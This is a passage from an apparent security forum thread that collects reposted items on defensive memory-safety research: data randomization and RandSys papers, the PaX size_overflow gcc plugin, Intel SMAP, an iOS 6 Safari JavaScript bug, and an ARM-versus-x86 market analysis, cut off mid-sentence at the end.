  5. Data Randomization Cristian Cadar Microsoft Research Cambridge, UK cristic@stanford.edu Periklis Akritidis Microsoft Research Cambridge, UK pa280@cl.cam.ac.uk Manuel Costa Microsoft Research Cambridge, UK manuelc@microsoft.com Jean-Phillipe Martin Microsoft Research Cambridge, UK jpmartin@microsoft.com Miguel Castro Microsoft Research Cambridge, UK mcastro@microsoft.com Abstract Attacks that exploit memory errors are still a serious problem. We present data randomization, a new technique that provides probabilistic protection against these attacks by xoring data with random masks. Data randomization uses static analysis to partition instruction operands into equivalence classes: it places two operands in the same class if they may refer to the same object in an execution that does not violate memory safety. Then it assigns a random mask to each class and it generates code instrumented to xor data read from or written to memory with the mask of the memory operand’s class. Therefore, attacks that violate the results of the static analysis have unpredictable results. We implemented a data randomization prototype that compiles programs without modifications and can preventmany attacks with low overhead. Our prototype prevents all the attacks in our benchmarks while introducing an average runtime overhead of 11%(0%to 27%) and an average space overhead below 1%. Download: research.microsoft.com/pubs/70626/tr-2008-120.pdf
  6. Thwarting Code Injection Attacks with System Service Interface Randomization Xuxian Jiangy, Helen J. Wangz, Dongyan Xu, Yi-Min Wangz y George Mason University z Microsoft Research Purdue University xjiang@ise.gmu.edu fhelenw, ymwangg@microsoft.com dxu@cs.purdue.edu Abstract Code injection attacks are a top threat to today's Internet. With zero-day attacks on the rise, randomization techniques have been introduced to diversify software and operation systems of networked hosts so that attacks that succeed on one process or one host cannot succeed on others. Two most notable system-wide randomization techniques are Instruction Set Randomization (ISR) and Address Space Layout Randomization (ASLR). The former randomizes instruction set for each process, while the latter randomizes the memory address space layout. Both suffer from a number of attacks. In this paper, we advocate and demonstrate that by combining ISR and ASLR effectively, we can offer much more robust protection than each of them individually. However, trivial combination of both schemes is not sufcient. To this end, we make the key observation that system call instructions matter the most to attackers for code injection. Our system, RandSys, uses system call instruction randomization and the general technique of ASLR along with a number of new enhancements to thwart code injection attacks. We have built a prototype for both Linux and Windows platforms. Our experiments show that RandSys can effectively thwart a wide variety of code injection attacks with a small overhead. Keywords: Internet Security, Code Injection Attack, System Randomization Download: research.microsoft.com/en-us/um/people/helenw/papers/randSys.pdf
  7. Linux Security in 10 years Brad Spengler / grsecurity Download: grsecurity.net/spender_summit.pdf
  8. The Guaranteed End of Arbitrary Code Execution Online: http://grsecurity.net/PaX-presentation_files/frame.htm
  9. Inside the Size Overflow Plugin by ephox » Tue Aug 28, 2012 5:30 pm Hello everyone, my name is Emese (ephox). You may already know me for my previous project, the constify gcc plugin that pipacs took over and put into PaX. http://www.grsecurity.net/~ephox/const_plugin/ This time I would like to introduce to you a 1-year-old project of mine that entered PaX a few months ago. It's another gcc plugin called size_overflow whose purpose is to detect a subset of the integer overflow security bugs at runtime. https://grsecurity.net/~ephox/overflow_plugin/ On integer overflows briefly In the C language integer types can represent a finite range of numbers. If the result of an arithmetic operation falls outside of the type's range (e.g., the largest representable value plus one) then the value overflows or underflows. This becomes a problem if the programmer didn't think of it, e.g., the size parameter of memory allocator function becomes smaller due to the overflow. There is a very good description on integer overflow in Phrack: http://www.phrack.org/issues.html?issue ... 10#article The history of the plugin The plugin is based on spender's idea, the intoverflow_t type found in older PaX versions. This was a 64 bit wide integer type on 32 bit archs and a 128 bit wide integer type on 64 bit archs. There were wrapper macros for the important memory allocator functions (e.g., kmalloc) where the value to be put into the size argument (of size_t type) could be checked against overflow. For example: #define kmalloc(size,flags) \ ({ \ void *buffer = NULL; \ intoverflow_t overflow_size = (intoverflow_t)size; \ \ if (!WARN(overflow_size > ULONG_MAX, "kmalloc size overflow\n")) \ buffer = kmalloc((size_t)overflow_size, (flags)); \ buffer; \ }) This solution had a problem in that the size argument is usually the result of a longer computation that consists of several expressions. The intoverflow_t cast based check could only verify the last expression that was used as the argument to the allocator function and even then it only helped if the type cast of the leftmost operand affected the other operands as well. Therefore if there was an integer overflow during the evaluation of the other expressions then the remaining computation would use the overflowed value that the intoverflow_t cast cannot detect. Second, only a few basic allocator functions had wrapper macros because wrapping every function with a size argument would have been a big job and resulted in an unmaintainable patch. In contrast, the size_overflow plugin recomputes all subexpressions of the expression with a double wide integer type in order to detect overflows during the evaluation of the expression. Internals of the size_overflow plugin The compilation process is divided into passes in between or in place of which a plugin can insert its own. Each pass has a specific task (e.g., optimization, transformation, analysis) and they run in a specific order on a translation unit (some optimization passes may be skipped depending on the optimization level). The plugin's pass (size_overflow_pass) executes after the "ssa" GIMPLE pass which is among the early GIMPLE passes. It's placed there to allow all the later optimization passes to properly optimize the code modified by the plugin. Before I describe the plugin in more detail, let's look at some gcc terms The gimple structure in gcc represents the statements (stmt) of the high level language. For example this is what a function call (gimple_code: GIMPLE_CALL) looks like: gimple_call <malloc, D.4425_2, D.4421_15> or a subtract (gimple_code: GIMPLE_ASSIGN) stmt: gimple_assign <minus_expr, D.4421_15, D.4464_12, a_5> This stmt has 3 operands, one lhs (left hand side) and two rhs (right hand side) ones. Each variable is of type "tree" and has a name (SSA_NAME) and version number (SSA_NAME_VERSION) while we are in SSA (static single assignment) mode. As we can see the parameter of malloc is the variable D.4421_15 (SSA_NAME: 4421, SSA_NAME_VERSION: 15) which is also the lhs of the assignment, so we use-def relation between the two stmts, that is the defining statement (def_stmt) of the variable D.4421_15 is the D.4421_15 = D.4464_12 - a_5 stmt. Further reading on SSA and GIMPLE: SSA - GNU Compiler Collection (GCC) Internals GIMPLE - GNU Compiler Collection (GCC) Internals The plugin gets called for each function and goes through their stmts looking for calls to marked functions. In the kernel, functions can be marked two ways: with a function attribute for fuctions at the bottom of the function call hierarchy (e.g., copy_user_generic, __copy_from_user, __copy_to_user, __kmalloc, __vmalloc_node_range, vread) listed in a hash table (for functions calling the above basic functions) In userland there is only a hash table (e.g., openssl). The present description covers the kernel. The attribute Plugins can define new attributes. This plugin defines a new function attribute which is used to mark the size parameters of interesting functions so that they can be tracked backwards. This is what the attribute looks like: __attribute__((size_overflow(1))) where the parameter (1) refers to the function argument (they are numbered from 1) that we want to check for overflow. In the kernel there is a #define for this attribute similarly to other attributes: __size_overflow(...). For example: unsigned long __must_check clear_user(void __user *mem, unsigned long len) __size_overflow(2); static inline void* __size_overflow(1,2) kcalloc(size_t n, size_t size, gfp_t flags) { ... } Further documentation about attributes: Attributes - GNU Compiler Collection (GCC) Internals The hash table Originally we only had the attribute similarly to the constify plugin but in order to reduce the kernel patch size (e.g., in 3.5.1 2920 functions are marked) all functions except for the base ones are stored in a hash table. The hash table is generated by the tools/gcc/generate_size_overflow_hash.sh script from tools/gcc/size_overflow_hash.data into tools/gcc/size_overflow_hash.h. A hash table entry is described by the size_overflow_hash structure whose fields are the following: next: the hash chain pointer to the next entry name: name of the function param: an integer with bits set corresponding to the size parameters For example this is what the hash entry of the include/linux/slub_def.h:kmalloc function looks like: struct size_overflow_hash _000008_hash = { .next = NULL, .name = "kmalloc", .param = PARAM1, }; The hash table is indexed by a hash computed from numbers describing the function declarations (get_tree_code()). Example: struct size_overflow_hash *size_overflow_hash[65536] = { [11268] = &_000008_hash, }; The hash algorithm is CrapWow: http://www.team5150.com/~andrew/noncryptohashzoo/CrapWow.html Enabling the size_overflow plugin in the kernel in menuconfig (under PaX): Security options -> PaX -> Miscellaneous hardening features -> Prevent various integer overflows in function size parameters .config (under PaX): CONFIG_PAX_SIZE_OVERFLOW .config (without PaX): CONFIG_SIZE_OVERFLOW stmt duplication with double wide integer types When the plugin finds a marked function then it traces back the use-def chain of the parameter(s) defined by the function attribute. The stmts found recursively are duplicated using variables of double wide integer types. In some cases duplication is not the right strategy. In these cases the plugin takes the lhs of the original stmt and casts it to the double wide type: function calls (GIMPLE_CALL): they cannot be duplicated because they may have side effects. This also means that the current plugin version doesn't check if a function returns an overflowed value, see todo inline asm (GIMPLE_ASM): it may have side effects too. taking the address of an object (ADDR_EXPR): todo pointers (MEM_REF, etc.): todo division (RDIV_EXPR, etc.): special case for the kernel because it doesn't support division with double wide types global variables: todo If the marked function's parameter can be traced back to a parameter of the caller then the plugin checks if the caller is already in the hash table (or it is marked with the attribute). If it isn't then the plugin prints the following message: Function %s is missing from the size_overflow hash table +%s+%d+%u+" (caller's name, parameter's number, hash) If anyone sees this message, please send it to me by e-mail (re.emese@gmail.com) so that I can put the caller into the hash table, otherwise the plugin will not apply the overflow check to it. Inserting the overflow checks The plugin inserts overflow checks in the following cases: marked function parameters just before the function call stmt with a constant operand, see gcc intentional overflow negations (BIT_NOT_EXPR) type cast stmts between these types: --------------------------------- | from | to | lhs | rhs | --------------------------------- | u32 | u32 | - | ! | | u32 | s32 | TODO | *! | | s32 | u32 | TODO | *! | | s32 | s32 | - | ! | | u32 | u64 | ! | ! | | u32 | s64 | TODO | ! | | s32 | u64 | TODO | ! | | s32 | s64 | ! | ! | | u64 | u32 | ! | ! | | u64 | s32 | TODO | ! | | s64 | u32 | TODO | ! | | s64 | s32 | ! | ! | | u64 | u64 | - | ! | | u64 | s64 | TODO | *! | | s64 | u64 | TODO | *! | | s64 | s64 | - | ! | --------------------------------- Legend: from: source type to: destination type lhs: is the lhs checked? rhs: is the rhs checked? !: the plugin inserts an overflow check TODO: would be nice to insert an overflow check, see todo *!: the plugin inserts an overflow check except when the stmt's def_stmt is a MINUS_EXPR (subtraction) -: no overflow check is needed When the plugin finds one of the above cases then it will insert a range check against the double wide variable value (TYPE_MIN, TYPE_MAX of the original variable type). This guarantees that at runtime the value fits into the original variable's type range. If the runtime check detects an overflow then the report_size_overflow function will be called instead of executing the following stmt. The marked function's parameter is replaced with a variable cast down from its double wide clone so that gcc can potentially optimize out the stmts computing the original variable. If we uncomment the print_the_code_insertions function call in the insert_check_size_overflow function then the plugin will print out this message during compilation: "Integer size_overflow check applied here." This message isn't too useful because later passes in gcc will optimize out about 6 out of 10 insertions. If anyone is interested in the insertion count after optimizations then try this command (on the kernel): objdump -drw vmlinux | grep "call.*report_size_overflow" | wc -l report_size_overflow The plugin creates the report_size_overflow declaration in the start_unit_callback, but the definition is always in the current program. The plugin inserts only the report_size_overflow calls. This is a no-return function. This function prints out the file name, the function name and the line number of the detected overflow. If the stmt's line number is not available in gcc then it prints out the caller's start line number. The last two strings are only debug information. The report_size_overflow function's message looks like this (without PaX it uses SIZE_OVERFLOW instead of PAX): PAX: size overflow detected in function main tests/main12.c:27 cicus.4_21 (max) In the kernel the report_size_overflow function is in fs/exec.c. The overflow message is sent to dmesg along with a stack backtrace and then it sends a SIGKILL to the process that tiggered the overflow. In openssl the report_size_overflow function is in crypto/mem.c. The overflow message is sent to syslog and the triggering process is sent a SIGSEGV. Plugin internals through a simple example The source code (test.c): extern void *malloc(size_t size) __attribute__((size_overflow(1))); void * __attribute__((size_overflow(1))) coolmalloc(size_t size) { return malloc(size); } void report_size_overflow(const char *file, unsigned int line, const char *func, const char *ssa_name) { printf("SIZE_OVERFLOW: size overflow detected in function %s %s:%u %s", func, file, line, ssa_name); _exit(1); } int main(int argc, char *argv[]) { unsigned long a; unsigned long b; unsigned long c = 10; a = strtoul(argv[1], NULL, 0); b = strtoul(argv[2], NULL, 0); c = c + a * b; return printf("%p\n", coolmalloc(c)); } Compile the plugin: gcc -I`gcc -print-file-name=plugin`/include/c-family -I`gcc -print-file-name=plugin`/include -fPIC -shared -O2 -o size_overflow_plugin.so size_overflow_plugin.c Compile test.c with the plugin and dump its ssa representations: gcc -fplugin=size_overflow_plugin.so test.c -O2 -fdump-tree-all Each dumpable gcc pass is dumped by -fdump-tree-all. This blog post focuses on the ssa and the size_overflow passes. The marked function is coolmalloc, the traced parameter is c_12. The main function's ssa representaton is below, just before executing the size_overflow pass (test.c.*.ssa*): main (int argc, char * * argv) { long unsigned int c; long unsigned int b; long unsigned int a; const char * restrict D.3291; void * D.3290; int D.3289; long unsigned int D.3288; const char * restrict D.3287; char * D.3286; char * * D.3285; const char * restrict D.3284; char * D.3283; char * * D.3282; <bb 2>: c_1 = 10; D.3282_3 = argv_2(D) + 4; D.3283_4 = *D.3282_3; D.3284_5 = (const char * restrict) D.3283_4; a_6 = strtoul (D.3284_5, 0B, 0); D.3285_7 = argv_2(D) + 8; D.3286_8 = *D.3285_7; D.3287_9 = (const char * restrict) D.3286_8; b_10 = strtoul (D.3287_9, 0B, 0); D.3288_11 = a_6 * b_10; c_12 = D.3288_11 + c_1; D.3290_13 = coolmalloc (c_12); D.3291_14 = (const char * restrict) &"%p\n"[0]; D.3289_15 = printf (D.3291_14, D.3290_13); return D.3289_15; } After the size_overflow pass on a 32 bit arch (test.c.*size_overflow*): main (int argc, char * * argv) { long unsigned int cicus.7; long long unsigned int cicus.6; long long unsigned int cicus.5; long long unsigned int cicus.4; long long unsigned int cicus.3; long long unsigned int cicus.2; long unsigned int c; long unsigned int b; long unsigned int a; const char * restrict D.3291; void * D.3290; int D.3289; long unsigned int D.3288; const char * restrict D.3287; char * D.3286; char * * D.3285; const char * restrict D.3284; char * D.3283; char * * D.3282; <bb 2>: c_1 = 10; cicus.5_24 = (long long unsigned int) c_1; D.3282_3 = argv_2(D) + 4; D.3283_4 = *D.3282_3; D.3284_5 = (const char * restrict) D.3283_4; a_6 = strtoul (D.3284_5, 0B, 0); cicus.2_21 = (long long unsigned int) a_6; D.3285_7 = argv_2(D) + 8; D.3286_8 = *D.3285_7; D.3287_9 = (const char * restrict) D.3286_8; b_10 = strtoul (D.3287_9, 0B, 0); cicus.3_22 = (long long unsigned int) b_10; D.3288_11 = a_6 * b_10; cicus.4_23 = cicus.2_21 * cicus.3_22; c_12 = D.3288_11 + c_1; cicus.6_25 = cicus.4_23 + cicus.5_24; cicus.7_26 = (long unsigned int) cicus.6_25; if (cicus.6_25 > 4294967295) goto <bb 3>; else goto <bb 4>; <bb 3>: report_size_overflow ("test.c", 28, "main", "cicus.6_25 (max)\n"); <bb 4>: D.3290_13 = coolmalloc (cicus.7_26); D.3291_14 = (const char * restrict) &"%p\n"[0]; D.3289_15 = printf (D.3291_14, D.3290_13); return D.3289_15; } Some problems encountered during development gcc intentional overflow: Gcc can produce unsigned overflows while transforming expressions. e.g., it can transform constants that will produce the correct result with unsigned overflow on the given type. (e.g., a-1 -> a+4294967295) The plugin used to detect this (false positive) overflow at runtime . The solution is to not duplicate such stmts that contain constants. Instead, the plugin inserts an overflow check for the non-constant rhs before that stmt and uses its lhs (cast to the double wide type) in later duplication. For example on 32 bit: coolmalloc(a * b - 1 + argc) before size_overflow plugin:... D.4416_10 = a_5 * b_9; D.4418_13 = D.4416_10 + argc.0_12; D.4419_14 = D.4418_13 + 4294967295; D.4420_15 = coolmalloc (D.4419_14); ... after size_overflow plugin: ... D.4416_10 = a_5 * b_9; cicus.7_25 = cicus.4_22 * cicus.6_24; D.4418_13 = D.4416_10 + argc.0_12; cicus.9_27 = cicus.7_25 + cicus.8_26; cicus.10_28 = (unsigned int) cicus.9_27; cicus.11_29 = (long long unsigned int) cicus.9_27; if (cicus.11_29 > 4294967295) goto <bb 3>; else goto <bb 4>; <bb 3>: report_size_overflow ("test.c", 28, "main"); <bb 4>: D.4419_14 = cicus.10_28 + 4294967295; cicus.12_30 = (long long int) D.4419_14; ... when a size parameter is used for more than one purpose (not just for size): The plugin cannot recognize this case. When I get a false positive report I remove the function from the hash table. type cast from gcc or the programmer causing intentional overflows. This is the reason for the TODOs in the table above Detecting a real security issue I'll demonstrate the plugin on an openssl 1.0.0 bug (CVE-2012-2110). To reproduce the overflow with this: http://lock.cmpxchg8b.com/openssl-1.0.1-testcase-32bit.crt.gz Download the plugin source (or use the ebuild) from here: https://grsecurity.net/~ephox/overflow_plugin/ Download the openssl patch (that contains the report_size_overflow function): http://grsecurity.net/~ephox/overflow_plugin/userland_patches/openssl-1.0.0/ Compile openssl with the plugin (see the README) after that we can reproduce the bug: openssl-1.0.0.h/bin $ ./openssl version OpenSSL 1.0.0h 12 Mar 2012 openssl-1.0.0.h/bin $ ./openssl x509 -in ../../openssl-1.0.1-testcase-32bit.crt -text -noout -inform DER Segmentation fault In syslog there is the plugins's message: SIZE_OVERFLOW: size overflow detected in function asn1_d2i_read_bio a_d2i_fp.c:228 cicus.69_205 (max) I'll have more (gentoo) ebuilds if anyone wants to use the plugin in userland (for now only openssl): http://grsecurity.net/~ephox/overflow_plugin/gentoo/ Performance impact hardware: quad core sandy bridge kernel version: 3.5.1 patch: pax-linux-3.5.1-test16.patch overflow checks after optimization (gcc-4.7.1): 931 With the size_overflow plugin disabled: Performance counter stats for 'du -s /test' (10 runs): 4345.283145 task-clock # 0.983 CPUs utilized ( +- 0.12% ) 1,107 context-switches # 0.255 K/sec ( +- 0.09% ) 0 CPU-migrations # 0.000 K/sec ( +-100.00% ) 3,763 page-faults # 0.866 K/sec ( +- 0.13% ) 14,641,126,270 cycles # 3.369 GHz ( +- 0.03% ) 4,228,389,062 stalled-cycles-frontend # 28.88% frontend cycles idle ( +- 0.06% ) 1,962,172,809 stalled-cycles-backend # 13.40% backend cycles idle ( +- 0.23% ) 25,463,911,605 instructions # 1.74 insns per cycle # 0.17 stalled cycles per insn ( +- 0.01% ) 6,968,592,408 branches # 1603.714 M/sec ( +- 0.01% ) 47,230,732 branch-misses # 0.68% of all branches ( +- 0.07% ) 4.419888484 seconds time elapsed ( +- 0.12% ) With the size_overflow plugin enabled: Performance counter stats for 'du -s /test' (10 runs): 4291.088943 task-clock # 0.983 CPUs utilized ( +- 0.08% ) 1,093 context-switches # 0.255 K/sec ( +- 0.08% ) 0 CPU-migrations # 0.000 K/sec 3,761 page-faults # 0.877 K/sec ( +- 0.15% ) 14,481,436,247 cycles # 3.375 GHz ( +- 0.05% ) 4,155,959,526 stalled-cycles-frontend # 28.70% frontend cycles idle ( +- 0.15% ) 2,003,994,250 stalled-cycles-backend # 13.84% backend cycles idle ( +- 0.54% ) 25,436,031,783 instructions # 1.76 insns per cycle # 0.16 stalled cycles per insn ( +- 0.00% ) 6,960,975,325 branches # 1622.193 M/sec ( +- 0.00% ) 47,125,984 branch-misses # 0.68% of all branches ( +- 0.07% ) 4.365185965 seconds time elapsed ( +- 0.08% ) TODO: I don't know why it was faster with the plugin on these tests During compilation it didn't cause too much slowdown (0.077s only). Allyes kernel config statistics after optimization (number of calls to report_size_overflow, gcc-4.6.2) 3.5.0: vmlinux_4.6.x_i386-yes: 2556 vmlinux_4.6.x_x86_64-yes: 2659 3.2.26: vmlinux_4.6.x_i386-yes: 2657 vmlinux_4.6.x_x86_64-yes: 2756 2.6.32.59: vmlinux_4.6.x_i386-yes: 1893 vmlinux_4.6.x_x86_64-yes: 2353 Future plans enable the plugin to compile c++ sources compile the following programs with the plugin glibc: i tried to compile it already but the make system doesn't like my report_size_overflow function, so I'll try it later glib syslog-ng: I don't yet know where to report the overflow message (chicken and egg problem ) firefox chromium samba apache php the Android kernel anything with an integer overflow CVE [*]plugin internals plans: print out overflowed value in the report message comments optimization: use unlikely/__builtin_expect for the inserted checks if the expression can be tracked back to the result of a function call then the function's return value should be tracked back as well handle ADDR_EXPR make use of LTO (gcc 4.7+): could get rid of the hash table llvm size_overflow plugin an IPA pass to be able to track back across static functions in a translation unit, it would reduce the hash table handle function pointers handle struct fields fix this side effect: warning: call to 'copy_to_user_overflow' declared with attribute warning: copy_to_user() buffer size is not provably correct solve all the TODO items in the cast handling table If anyone's interested in compiling other userland programs with the plugin then please send the hash table and the patch to me please Sursa: grsecurity forums • View topic - Inside the Size Overflow Plugin
  10. [h=3]Supervisor Mode Access Prevention[/h]by PaX Team » Fri Sep 07, 2012 9:05 pm With the latest release of their Architecture Instruction Set Extensions Programming Reference Intel has finally lifted the veil on a new CPU feature to debut in next year's Haswell line of processors. This new feature is called Supervisor Mode Access Prevention (SMAP) and there's a reason why its name so closely resembles Supervisor Mode Execution Prevention (SMEP), the feature that debuted with Ivy Bridge processors a few months ago. While the purpose of SMEP was to control instruction fetches and code execution from supervisor mode (traditionally used by the kernel component of operating systems), SMAP is concerned with data accesses from supervisor mode. In particular, SMEP, when enabled, prevents code execution from userland memory pages by the kernel (the favourite exploit technique against kernel security bugs), whereas SMAP will prevent unintended data accesses to userland memory. The twist in the story and the reason why these security features couldn't be implemented as one lies in the fact that the kernel does have legitimate need to access data in userland memory at times while no contemporary kernel needs to execute code from there. In other words, while SMEP can be enabled unconditionally by flipping a bit at boot time, SMAP needs more care because it has to be disabled/enabled around legitimate accessor functions in the kernel. Intel has added two new instructions for this very purpose (CLAC/STAC) and repurposed the alignment check status bit in supervisor mode to enable quick switching around SMAP at runtime. This will require more extensive changes in kernel code than SMEP did but the amount of code is still quite managable. Third party kernel modules that don't use the kernel's userland accessor functions will have to take care of switching SMAP on/off themselves. What does SMAP mean for PaX? The situation is similar to last year's SMEP that made efficient implementation of (partial) KERNEXEC possible on amd64 (i386/KERNEXEC continues to rely on segmentation instead which provides better protection than SMEP can). SMAP's analog feature in PaX is called UDEREF which so far couldn't be efficiently implemented on amd64 (once again, i386/UDEREF will continue to rely on segmentation to provide better userland/kernel separation than SMAP can). Beyond allowing an efficient implementation of UDEREF there'll be other uses for SMAP (or perhaps a future variant of it) in PaX: sealed kernel memory whose access is carefully controlled even for kernel code itself. What does SMAP mean for security? Similarly to UDEREF, an SMAP enabled kernel will be prevented from accessing userland memory in unintended ways, e.g., attacker controlled pointers can no longer target userland memory directly, but even simple kernel bugs such as NULL pointer based dereferences will just trigger a CPU exception instead of letting the attacker take over kernel data flow. Coupled with SMEP this means that future exploits against memory corruption bugs will have to entirely rely on targeting kernel memory (which has been the case under UDEREF/KERNEXEC for many years now). This of course means that for reliable exploitation detailed knowledge of runtime kernel memory will become a premium, therefore abusing bugs that leak kernel memory to userland will become the first step towards exploiting memory corruption bugs. While UDEREF and SMAP prevent gratuitous memory leaks, they still have to allow intended userland accesses and that is exactly the escape hatch that several exploits have already targeted and we can expect more in the future. Fortunately we are once again at the forefront of this game with several features that prevent or at least greatly reduce the amount of informaton that can be so leaked from the kernel to userland (HIDESYM, SANITIZE, SIZE_OVERFLOW, STACKLEAK, USERCOPY). TL;DR: Intel implements UDEREF equivalent 6 years after PaX, PaX will make use of it on amd64 for improved performance. Sursa: grsecurity forums • View topic - Supervisor Mode Access Prevention
  11. iOS 6 Javascript Bug Raises Potential Security And Privacy Questions By Istvan Fekete last updated December 23, 2012 iOS 6 Safari has a potentially serious Javascript bug, which could have some serious security and privacy implications. According to a report from AppleInsider, users who toggle off Javascript in the iOS 6 Safari web browser are not totally in the clear. The appearance of a Smart App Banner designed to give developers the ability to promote App Store software within Safari on a certain website, automatically toggles your Javascript back on without notifying the user. You can check out this bug by opening up the Setting app and choosing Safari, then turning off Javascript. Then you can visit this test page using your iPhone's browser. As you will see, it will turn on Javascript, without notifying you. Peter Eckersley, technology products director with digital rights advocacy group, the Electronic Frontier Foundation, said he would characterize such an issue as a "serious privacy and security vulnerability." Neither Eckersley nor the EFF had heard of the bug in iOS 6, nor had they independently tested to confirm that they were able to replicate the issue. But Eckersley said that if the problem is in fact real, it's something that Apple should work to address as quickly as possible. "It is a security issue, it is a privacy issue, and it is a trust issue," Eckersley said. "Can you trust the UI to do what you told it to do? It's certainly a bug that needs to be fixed urgently." According to the report, this issue has existed ever since iOS 6 went public, and the recent updates iOS 6.0.1 and iOS 6.0.2 didn't patch it. Furthermore, the bug isn't iPhone specific, it applies to all iDevices running iOS 6 and even iOS 6.1 beta seems to carry this bug as well. Sursa: iOS 6 Javascript Bug Raises Potential Security And Privacy QuestionsJaxov
  12. The End of x86? An Update by mjfern on December 21, 2012 In October 2010, I predicted the disruption of the x86 architecture, along with its major proponents Intel and AMD. The purpose of this current article is to reassess this prediction in light of recent events. Below, I present the classic signs of disruption (drawing on Christensen’s framework), my original arguments in blockquotes, and then an update. 1. The current technology is overshooting the needs of the mass market. Due to a development trajectory that has followed in lockstep with Moore’s Law, and the emergence of cloud computing, the latest generation of x86 processors now exceed the performance needs of the majority of customers. Because many customers are content with older generation microprocessors, they are holding on to their computers for longer periods of time, or if purchasing new computers, are seeking out machines that contain lower performing and less expensive microprocessors. x86 shipments dropped by 9% in Q3 2012. Furthermore, the expected surge in PC sales (and x86 shipments) in Q4 due to the release of Windows 8 has failed to materialize. NPD data indicates that Windows PCs sales in U.S. retail stores fell a staggering 21% in the four-week period from October 21 to November 17, compared to the same period the previous year. [1] In short, there is now falling demand for x86 processors. Computer buyers are shifting their spending from PCs to next generation computing devices, including smartphones and tablets. 2. A new technology emerges that excels on different dimensions of performance. While the x86 architecture excels on processing power – the number of instructions handled within a given period of time – the ARM architecture excels at energy efficiency. According to Data Respons (datarespons.com, 2010), an “ARM-based system typically uses as little as 2 watts, whereas a fully optimized Intel Atom solution uses 5 or 6 watts.” The ARM architecture also has an advantage in form factor, enabling OEMs to design and produce smaller devices. While Intel has closed the ARM energy efficiency gap with its latest x86 Atom processers, the latest generation ARM-based chips are outperforming their Atom counterparts. And the performance advantage of ARM-based processors is expected through 2013. The ARM architecture also continues to maintain a significant advantage in the area of customization, form factor, and price due to ARM Holding’s unique licensing-based business model. Because of these additional benefits of ARM technology, it’s unlikely that Intel’s energy efficiency gains will significantly affect its short-term market penetration. 3. Because this new technology excels on a different dimension of performance, it initially attracts a new market segment. While x86 is the mainstay technology in PCs, the ARM processor has gained significant market share in the embedded systems and mobile devices markets. ARM-based processors are used in more than 95% of mobile phones (InformationWeek, 2010). And the ARM architecture is now the main choice for deployments of Google’s Android and is the basis of Apple’s A4 system on a chip, which is used in the latest generation iPod Touch and Apple TV, as well as the iPhone 4 and iPad. ARM-based processors continue to dominate smartphones and tablets, with the ARM architecture maintaining a market share of 95% and 98%, respectively. [2] In the first half of 2012, there were just six phones with x86 chips inside (i.e., 0.2% of the worldwide market). And, as of December 2012, there was scarce availability of tablets with x86 processors. [3] A major concern going forward is that Intel is limiting tablet support to Windows 8. 4. Once the new technology gains a foothold in a new market segment, further technology improvements enable it to move up-market, displacing the incumbent technology. With its foothold in the embedded systems and mobile markets, ARM technology continues to improve. The latest generation ARM chip (the Cortex-A15) retains the energy efficiency of its predecessors, but has a clock speed of up to 2.5 GHz, making it competitive with Intel’s chips from the standpoint of processing power. As evidence of ARM’s move up-market, the startup Smooth-Stone recently raised $48m in venture funding to produce energy efficient, high performance chips based on ARM to be used in servers and data centers. I suspect we will begin seeing the ARM architecture in next generation latops, netbooks, and smartphones (e.g., A4 in a MacBook Air). ARM’s latest Cortex-A15 processor is highly competitive with Intel’s Atom line of processors. In a benchmarking analysis, “the [ARM-based] Samsung Exynos 5 Dual…easily beat out all of the tested Intel Atom processors.” And while Intel’s Core i3 processors outperformed the ARM-based processors, the iCore’s performance-per-watt makes it unsuitable for smartphones and tablets. Since energy conservation and cost is a growing concern among manufacturers, IT departments, and consumers, ARM-based chips are also moving upmarket into more demanding devices. While ARM technology hasn’t made much headway in traditional desktop PCs and laptops, it’s been deployed in the latest generation Google Chromebook, produced by Samsung. It’s also the processor of choice in Microsoft’s Surface RT, which is arguably a hybrid device (PC and tablet) given it runs Windows and Office and has a keyboard. Furthermore, ARM’s penetration of the server market is ushering in a new “microserver” era, with support from AMD, Calxeda, Dell, HP, Marvell, Samsung, Texas Instruments, and others (e.g., Applied Micro). [4] 5. The new, disruptive technology looks financially unattractive to established companies, in part because they have a higher cost structure. In 2009, Intel’s costs of sales and operating expenses were a combined $29.6 billion. In contrast, ARM Holdings, the company that develops and supports the ARM architecture, had total expenses (cost of sales and operating) of $259 million. Unlike Intel, ARM does not produce and manufacture chips; instead it licenses its technology to OEMs and other parties and the chips are often manufactured using a contract foundry (e.g., TSMC). Given ARM’s low cost structure, and the competition in the foundry market, “ARM offers a considerably cheaper total solution than the x86 architecture can at present…” (datarespons.com, 2010). Intel is loathe to follow ARM’s licensing model because it would reduce Intel’s revenues and profitability substantially. In the first three quarters of 2012, Intel had revenue of $38.864 billion, operating expenses of $28.509b, and operating income of $11.355b. In contrast, ARM Holdings, with its licensing-based business model, had revenue of $886.88 million, operating expenses of $576.5m, and operating income of $307.12m. ARM Holdings has revenues and profits that are just a fraction (2-3%) of Intel’s. This is the case even though ARM-based processors have a much greater share of the overall processor market. [5] The smartphone and tablet markets, despite their sheer size and growth rates, are financially unattractive in comparison to the PC market. The price point and margins on processors in the mobile markets are significantly lower than that of higher-end PC and server processors. For instance, as of November 2012, the “Atom processor division contribute[d] only around 2% to Intel’s valuation.” In short, the ARM architecture appears to be in the early stages of disrupting x86, not just in the mobile and embedded systems markets, but also in the personal computer and server markets, the strongholds of Intel and AMD. This is evidenced in part by investors’ expectations for ARM’s, Intel’s and AMD’s future performance in microprocessor markets: today ARM Holdings has a price to earnings ratio of 77.93, while Intel and AMD have price to earnings ratios of 10.63 and 4.26, respectively. It doesn’t appear Intel (or AMD) have solved the disruptive threat posed by ARM. The ARM architecture is maintaining its market share in smartphones and tablets, and gaining ground in upmarket devices, from hybrids (Chromebook and Surface RT) to servers. Investors concur with this assessment, as ARM Holdings has a price to earnings ratio of 70.74, while Intel has a price to earnings ratio of 9.22. [6] For Intel and AMD to avoid being disrupted, they must offer customers a microprocessor with comparable (or better) processing power and energy efficiency relative to the latest generation ARM chips, and offer this product to customers at the same (or lower) price point relative to the ARM license plus the costs of manufacturing using a contract foundry. The Intel Atom is a strong move in this direction, but the Atom is facing resistance in the mobile market and emerging thin device markets (e.g., tablets) due to concerns about its energy efficiency, form factor, and price point. While Intel has closed the energy efficiency gap with its latest Atom processors, it still lags in performance and hasn’t dealt with the issues of customization and form factor. It’s likely that its pricing also remains unattractive. Although I don’t have precise data on Intel or ARM’s pricing for comparable processors, one can get an estimate by comparing Intel’s listed processor prices with teardown data from iSuppli. According to this rough analysis, the latest Atom processors range in price from $42-$75, while ARM-based processors have prices (including manufacturing) in the $15-25 range. [7] Therefore, Intel would need to offer a 60%+ discount off list prices to just achieve parity. The x86 architecture is supported by a massive ecosystem of 